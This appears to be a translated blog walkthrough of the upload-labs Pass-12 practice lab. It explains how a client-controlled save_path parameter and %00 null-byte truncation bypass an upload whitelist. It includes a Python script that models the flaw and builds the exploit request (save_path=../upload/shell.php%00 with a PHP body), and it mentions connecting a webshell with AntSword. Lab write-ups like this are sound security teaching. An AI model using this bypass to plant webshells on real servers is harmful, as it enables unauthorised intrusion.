[Network Security] Upload-labs Pass-12 Detailed Walkthrough

Readers can refer to and subscribe to the column: Upload-Labs range, offense and defense in practice


AntSword

This level uses the AntSword tool. For how to operate it, see:

[Network Security] AntSword in practice: detailed walkthrough (introductory)

[Network Security] DVWA File Upload: AntSword attack techniques and detailed walkthrough collection


Technique

Backend logic code:

[screenshot: backend PHP source of Pass-12; the key statements are quoted below]

The source code analysis is as follows:

  1. $ext_arr = array('jpg','png','gif');: defines the whitelist of extensions that may be uploaded; only jpg, png and gif files are accepted.

  2. $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);: extracts the extension from the uploaded filename. strrpos finds the last dot (.) and substr takes everything after it, so the extension is whatever follows the last dot in the client-supplied name.

  3. if(in_array($file_ext,$ext_arr)){ : checks whether that extension is in the whitelist.

    • If the extension is allowed, execution enters the conditional block:
    • $temp_file = $_FILES['upload_file']['tmp_name'];: fetches the temporary path where PHP stored the uploaded file on the server.
    • $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;: builds the destination path from the directory given in the save_path query parameter, a slash, a two-digit random number, the current date and time, and the whitelisted extension. This is the path the upload is saved under.

So the file is renamed and its extension is taken from a whitelist, but the directory part of the path comes straight from the save_path parameter, which the client controls.

Therefore a 00 (null byte) truncation can be used.

00 truncation is a flaw at the boundary between PHP and the operating system. The operating system and the C library it exposes are written in C (and assembly), and in C a string ends at the first \0 (0x00) byte: when a filesystem call receives a path, it stops reading at the first \0 and treats it as the end of the string. PHP strings carry an explicit length and can contain \0, so the bytes after the null survive inside PHP and are only dropped when the path is handed to the C-level filesystem function. This only works on PHP versions before 5.3.4; from 5.3.4 on, PHP's filesystem functions reject paths that contain a null byte (CVE-2006-7243). The lab also needs magic_quotes_gpc = Off, because magic quotes would escape the null byte as the two characters \0 instead of passing it through.

So, by editing the request and inserting a \0 at the point where the controlled path should end, everything the server appends after it (the slash, the random number, the timestamp and the .jpg extension) is cut off. Because save_path is read from the query string, the null byte can be written URL-encoded as %00; PHP decodes it into a real 0x00 byte before it reaches $_GET['save_path']. For example, save_path=../upload/shell.php%00 makes the upload land at ../upload/shell.php.
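The logic analysed above, the truncation it suffers, and the request that triggers it, written out as an added Python model (this is not code from upload-labs or from the original post; the host 127.0.0.1, the /Pass-12/index.php handler path, the ../upload directory, the filename shell.jpg and the fixed rand/timestamp values are assumptions):

```python
"""upload-labs Pass-12 model: the server-side path construction, the C-string
truncation caused by a NUL byte, and the request that triggers it.
Added example; not code from upload-labs or the original post. Host, URL path,
directory, filename and the fixed rand/timestamp values are assumptions."""
import urllib.parse

ALLOWED_EXT = ("jpg", "png", "gif")  # $ext_arr in the PHP source


def extension_check(upload_name):
    """Mirror of the PHP check: the extension is whatever follows the last
    '.' of the client-supplied filename. Returns it if whitelisted, else None."""
    ext = upload_name[upload_name.rfind(".") + 1:]
    return ext if ext in ALLOWED_EXT else None


def build_img_path(save_path, ext, rand=42, stamp="20230101000000"):
    """Mirror of
    $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
    rand(10,99) and date("YmdHis") are replaced by fixed values (assumption)
    so the result is deterministic."""
    return f"{save_path}/{rand}{stamp}.{ext}"


def c_string_view(path):
    """What the C filesystem API behind move_uploaded_file() sees: a
    NUL-terminated string, so everything from the first '\\0' on is dropped.
    PHP < 5.3.4 passes such a path through; 5.3.4+ rejects it (CVE-2006-7243)."""
    nul = path.find("\0")
    return path if nul < 0 else path[:nul]


def simulate_upload(save_path_param, filename):
    """Run the vulnerable logic end to end and return the path the file really
    lands at, or None if the extension whitelist rejects the filename."""
    ext = extension_check(filename)
    if ext is None:
        return None
    return c_string_view(build_img_path(save_path_param, ext))


def hardened_img_path(save_path_param, filename, allowed_dirs=("../upload",)):
    """How the same step should be written (Python model, not the lab's PHP):
    refuse NUL bytes and accept the directory only from a fixed list, so the
    client can neither pick the directory nor cut the generated name off."""
    if "\0" in save_path_param or "\0" in filename:
        raise ValueError("NUL byte in input")
    if save_path_param not in allowed_dirs:
        raise ValueError("save_path is not an allowed directory")
    ext = extension_check(filename)
    if ext is None:
        raise ValueError("extension not allowed")
    return build_img_path(save_path_param, ext)


def build_upload_request(host, save_path_param, filename, content):
    """Raw HTTP request as it would be edited in the proxy. save_path is a query
    parameter, so the NUL is sent URL-encoded as %00; PHP decodes it into a
    real 0x00 byte before it reaches $_GET['save_path']. /Pass-12/index.php is
    assumed to be the level's handler and 'upload' the submit button value."""
    query = urllib.parse.urlencode({"save_path": save_path_param})
    boundary = "----WebKitFormBoundaryExample"
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="upload_file"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n\r\n"
        f"{content}\r\n"
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="submit"\r\n\r\n'
        "upload\r\n"
        f"--{boundary}--\r\n"
    )
    head = (
        f"POST /Pass-12/index.php?{query} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body.encode())}\r\n\r\n"
    )
    return head + body


if __name__ == "__main__":
    # What save_path=../upload/shell.php%00 decodes to inside PHP (constructed input).
    payload = "../upload/shell.php\0"
    print("honest upload lands at:", simulate_upload("../upload", "shell.jpg"))
    print("truncated upload lands at:", simulate_upload(payload, "shell.jpg"))
    print(build_upload_request("127.0.0.1", payload, "shell.jpg", "<?php phpinfo(); ?>"))
```

Note that the filename in the multipart part stays shell.jpg so the whitelist passes; only the query parameter carries the null byte, and after c_string_view the random name, timestamp and .jpg suffix are gone.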

Capture the request:

[screenshot: the upload request captured in the proxy]

Modify the request:

[screenshot: the request with a null byte inserted into the save_path value]

Send the request:

[screenshot: the modified request being sent]

Get the upload path of the "image":

[screenshot: the path of the uploaded file shown in the response]

After that, the shell can be connected to with AntSword; that part is not covered in this article.


Summary

The above is the detailed walkthrough of [Network Security] upload-labs Pass-12; the detailed walkthrough of [Network Security] xss-labs Pass-13 will be shared later.

I am Qiu said, see you next time.


Origin blog.csdn.net/2301_77485708/article/details/132289386